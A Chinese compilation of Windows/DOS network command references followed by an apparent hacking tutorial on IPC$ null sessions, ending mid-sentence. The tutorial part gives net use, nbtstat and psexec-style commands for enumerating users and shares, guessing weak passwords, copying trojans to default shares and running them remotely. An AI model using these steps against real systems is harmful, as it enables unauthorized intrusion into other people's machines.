DOS下常用网络相关命令

Arp: 显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译
表。该命令只有在安装了 TCP/IP 协议之后才可使用



arp -a [inet_addr] [-N [if_addr]]



arp -d inet_addr [if_addr]



arp -s inet_addr ether_addr [if_addr]



参数



-a 通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算



机的 IP 和物理地址。



-g 与 -a 相同。



inet_addr 以加点的十进制标记指定 IP 地址。



-N 显示由 if_addr 指定的网络界面 ARP 项。



if_addr 指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第



一个可适用的接口。



-d 删除由 inet_addr 指定的项。



-s 在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物



理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定 IP



地址。项是永久性的,即在超时到期后项自动从缓存删除。



ether_addr 指定物理地址。



--------------------------------------------



Finger 在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变



量。该命令只有在安装了 TCP/IP 协议之后才可用。



finger [-l] [user]@computer[...]



参数



-l 以长列表格式显示信息。



user 指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:



@computer



--------------------------------------------



Ftp 将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机



传送文件(有时称作 daemon)。Ftp 可以交互使用。单击“相关主题”列表中的



“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议



之后才可用。Ftp 是一种服务,一旦启动,将创建在其中可以使用 ftp 命令的子环



境,通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当



ftp 子环境运行时,它由 ftp 命令提示符代表。



ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]



参数



-v 禁止显示远程服务器响应。



-n 禁止自动登录到初始连接。



-i 多个文件传送时关闭交互提示。



-d 启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。



-g 禁用文件名组,它允许在本地文件和路径名中使用通配符字符(* 和 ?)。(请参阅



联机“命令参考”中的 glob 命令。)



-s: filename 指定包含 ftp 命令的文本文件;当 ftp 启动后,这些命令将自动运行。该参数中



不允许有空格。使用该开关而不是重定向 (>)。



-a 在捆绑数据连接时使用任何本地接口。



-w:windowsize 替代默认大小为 4096 的传送缓冲区。



computer 指定要连接到远程计算机的计算机名或 IP 地址。如果指定,计算机必须是行的最



后一个参数。



--------------------------------------------



Nbtstat 该诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连



接。该命令只有在安装了 TCP/IP 协议之后才可用。 nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]



参数



-a remotename 使用远程计算机的名称列出其名称表。



-A IP address 使用远程计算机的 IP 地址并列出名称表。



-c 给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。



-n 列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS(其



他节点类型)注册。



-R 清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件。



-r 列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows



2000 计算机上,此选项返回要通过广播或 WINS 来解析和注册的名称数。



-S 显示客户端和服务器会话,只通过 IP 地址列出远程计算机。



-s 显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名



称。



interval 重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新



显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息。



--------------------------------------------



Netstat 显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后



才可以使用。



netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]



参数



-a 显示所有连接和侦听端口。服务器连接通常不显示。



-e 显示以太网统计。该参数可以与 -s 选项结合使用。



-n 以数字格式显示地址和端口号(而不是尝试查找名称)。



-s 显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选



项可以用来指定默认的子集。



-p protocol 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -



s选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或ip。



-r 显示路由表的内容。



interval 重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新



显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。



--------------------------------------------



Ping 验证与远程计算机的连接。该命令只有在安装了 TCP/IP 协议后才可以使用。



ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] [-k computer-list]] [-w timeout] destination-list



参数



-t Ping 指定的计算机直到中断。 -a 将地址解析为计算机名。



-n count 发送 count 指定的 ECHO 数据包数。默认值为 4。



-l length 发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是



65,527。



-f 在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。



-i ttl 将“生存时间”字段设置为 ttl 指定的值。



-v tos 将“服务类型”字段设置为 tos 指定的值。



-r count 在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,



最多 9 台计算机。



-s count 指定 count 指定的跃点数的时间戳。



-j computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中



间网关分隔(路由稀疏源)IP 允许的最大数量为 9。



-k computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中



间网关分隔(路由严格源)IP 允许的最大数量为 9。



-w timeout 指定超时间隔,单位为毫秒。



destination-list 指定要 ping 的远程计算机。



------------------------------------------



Rcp 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制



件。rcp 命令是一个连接命令,从 Windows 2000 计算机发出该命令时,也可以



用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以



在 UNIX 计算机上使用,而在 Windows 2000 上不能使用,所以 Windows 2000



计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供



rcp 实用程序。



rcp [-a -b] [-h] [-r] source1 source2 ... sourceN destination



参数



-a 指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传



入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。 -b 指定二进制图像传输模式。没有执行回车/换行符转换。



-h 传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项,在



rcp 命令行上指定隐藏文件的效果与文件不存在一样。



-r 将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目



录,虽然即使源不是目录,使用 -r 也能够工作。但将没有递归。



source 和 destination



格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,计算机将假定为本地计算机。如果省略了 [.user] 部分,将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名,其中包含句点 (.) 分隔符,则必须包含 [.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则 destination 必须是目录。



如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 (\) 打头,则假定相对于当前的工作目录。在 Windows 2000 中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符(\、" 或 '),以便在远程计算机中使用通配符。



-------------------------------------------



Rexec 在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验



证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。



rexec computer [-l username] [-n] command



参数



computer 指定要运行 command 的远程计算机。



-l username 指定远程计算机上的用户名。



-n 将 rexec 的输入重定向到 NULL。



command 指定要运行的命令。



--------------------------------------------



Route 控制网络路由表。该命令只有在安装了 TCP/IP 协议后才可以使用。



route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]]



参数



-f 清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行



命令前清除。



-p 该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认



情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册



的持久路由列表。忽略其他所有总是影响相应持久路由的命令。



command 指定下列的一个命令。



命令目的 print 打印路由



add 添加路由



delete 删除路由



change 更改现存路由



destination 指定发送 command 的计算机。 mask subnetmask 指定与该路由条目关联的子网掩码。如果没有指定,将使用



255.255.255.255。



gateway 指定网关。



名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数。



metric costmetric 指派整数跃点数(从 1 到 9999)在计算最快速、最可*和(或)最便宜的



路由时使用。



---------------------------------------------------------------------------------



Rsh



在运行 RSH 服务的远程计算机上运行命令。该命令只有在安装了 TCP/IP 协议后才可以使用。



rsh computer [-l username] [-n] command



参数



computer 指定运行 command 的远程计算机。



-l username 指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。



-n 将 rsh 的输入重定向到 NULL。



command 指定要运行的命令。



__________________________________________________________________________________



Tftp 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远



程计算机传输文件。该命令只有在安装了 TCP/IP 协议后才可以使用。 tftp [-i] computer [get put] source [destination]



参数



-i 指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一



个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。



如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。



computer 指定本地或远程计算机。



put 将本地计算机上的文件 destination 传送到远程计算机上的文件 source。



get 将远程计算机上的文件 destination 传送到本地计算机上的文件 source。



如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 get。因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。



source 指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来



(如果获取),或从 stdin(如果放置)读取。



destination 指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。



________________________________________________________________________________



Tracert 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议



(ICMP) 回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上



的 TTL 之前至少递减 1,必需路径上的每个路由器,所以 TTL 是有效的跃点计



数。数据包上的 TTL 到达 0 时,路由器应该将“ICMP 已超时”的消息发送回源系



统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL



递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。路由通过检查中级



路由器发送回的“ICMP 已超时”的消息来确定路由。不过,有些路由器悄悄地下传



包含过期 TTL 值的数据包,而 tracert 看不到。



tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout] target_name



参数



/d 指定不将地址解析为计算机名。



-h maximum_hops 指定搜索目标的最大跃点数。



-j computer-list 指定沿 computer-list 的稀疏源路由。



-w timeout 每次应答等待 timeout 指定的微秒数。



target_name 目标计算机的名称。



DOS下恢复上5次注册表命令



Scanreg/restore




























FTP命令



FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。



如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。



FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,



其中 -v 显示远程服务器的所有响应信息;



-n 限制ftp的自动登录,即不使用;.n etrc文件;



-d 使用调试方式;



-g 取消全局文件名。



FTP使用的内部命令如下(中括号表示可选项):



1.![cmd[args>:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip



2.$ macro-ame[args]: 执行宏定义macro-name。



3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。



4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。



5.ascii:使用ascii类型传输方式。



6.bell:每个命令执行完毕后计算机响铃一次。



7.bin:使用二进制文件传输方式。



8.bye:退出ftp会话过程。



9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。



10.cd remote-dir:进入远程主机目录。



11.cdup:进入远程主机目录的父目录。



12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。



13.close:中断与远程服务器的ftp会话(与open对应)。



14.cr:使用asscii方式传输文件时,将回车换行转换为回行。



15.delete remote-file:删除远程主机文件。



16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。



17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件



18.disconnection:同close。



19.form format:将文件传输方式设置为format,缺省为file方式。



20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。



21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。



22.hash:每传输1024字节,显示一个hash符号(#)。



23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。



24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。



25.image:设置二进制传输方式(同binary)。



26.lcd[dir]:将本地工作目录切换至dir。



27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。



28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。



29.mdelete[remote-file]:删除远程主机文件。



30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。



31.mget remote-files:传输多个远程文件。



32.mkdir dir-name:在远程主机中建一目录。



33.mls remote-file local-file:同nlist,但可指定多个文件名。



34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。



35.modtime file-name:显示远程主机文件的最后修改时间。



36.mput local-file:将多个文件传输至远程主机。



37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。



38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。



39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。



40.ntrans[inchars[outchars>:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。



41.open host[port]:建立指定ftp服务器连接,可指定连接端口。



42.passive:进入被动传输方式。



43.prompt:设置多个文件传输时的交互提示。



44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。



45.put local-file[remote-file]:将本地文件local-file传送至远程主机。



46.pwd:显示远程主机的当前工作目录。



47.quit:同bye,退出ftp会话。



48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.



49.recv remote-file[local-file]:同get。



50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。



51.rhelp[cmd-name]:请求获得远程主机的帮助。



52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。



53.rename[from][to]:更改远程主机文件名。



54.reset:清除回答队列。



55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。



56.rmdir dir-name:删除远程主机目录。



57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。



58.send local-file[remote-file]:同put。



59.sendport:设置PORT命令的使用。



60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。



61.size file-name:显示远程主机文件大小,如:site idle 7200。



62.status:显示当前ftp状态。



63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。



64.sunique:将远程主机文件名存储设置为只一(与runique对应)。



65.system:显示远程主机的操作系统类型。



66.tenex:将文件传输类型设置为TENEX机的所需的类型。



67.tick:设置传输时的字节计数器。



68.trace:设置包跟踪。



69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。



70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3



71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。



72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.



73.?[cmd]:同help.



那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行
后台下载,假设你的ISP给你提供了shell并且可以用nohup,你想由fttp.downlo
ad.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
1.用notepad做一个文件如aaa1内容如下
   open ftp.dwonload.com user an onymous zyz@cenpok.net
cd /pub/internet/ i get aaa.zip close bye
2.拨号登录到你的ISP上。
用telnet 或netterm登录到shell,一般都在你的home子目录里bbs~/
3.用fttp上传aaa1到ISP服务器你的子目录。     
4. 执行nohup fttp -invd aaa2& 这样这个进程就被放在ISP服务器的后台进行了,
如果你想知道情况如何,可以more aaa2就可以知道情况如何了。这时你可以断线了或干点别的,
估计时间到了(time约=30M/(33.6K/9)s)拨号上去,more aaa2如果显示成功下载aaa.zip,
就表示aaa.zip已经被下载到ISP的服务器上了,你再由ISP的服务器拉回来就相当与点对点了,
记得下载完成后del掉你的文件(aaa.zip),免得浪费ISP资源,它会关掉shell的。














ipc$命令



一 摘要
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列。




二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?




三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?



空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?




四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:




1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。




2 查看远程主机的共享资源
命令:net view \\ip
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。



在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释



-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。



3 查看远程主机的当前时间
命令: net time \\ip
解释:用此命令可以得到一个远程主机的当前时间。




4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:



Node IpAddress: [*.*.*.*] Scope Id: []



NetBIOS Remote Machine Name Table



Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1c> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1b> UNIQUE Registered
OYAMANISHI-H <1e> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1c> GROUP Registered
IS~SERVER......<00> UNIQUE Registered



MAC Address = 00-50-8B-9A-2D-37




以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?




五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。



有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:



对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。




对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。




我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。




六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。




七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:



1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;




2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;




3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;




4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;




5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);




6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;




7 连接发起方未打开139,445端口;




8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话排除这种错误);




9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;




10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。




另外,你也可以根据返回的错误号分析原因:



错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。




八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?




1 对方未开启共享文件夹
这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文件夹存在。




2 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:



1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,并不能说明默认共享一定存在。ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;



2)由于net view \\IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)



要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。




3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;
2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录;
3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;



注意:
1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的
2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共享,那么你却可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。




4被防火墙杀死或在局域网
还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。




呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结的只是一些常见错误,没说到的,大家可以给我提个醒儿。




九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用p***ec.exe远程运行程序,假设想要远程机器执行本地c:\xinxin.exe文件,且管理员为administrator,密码为1234,那么输入下面的命令:
p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立ipc连接,则-u -p这两个参数不需要,p***ec.exe将自动拷贝文件到远程机器并运行。



本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码,我建议你尽量避开ipc管道。




十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马,cmd重定向等,然后在shell下执行:
net share ipc$
开放目标的ipc$共享;
net share ipc$ /del
关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:\
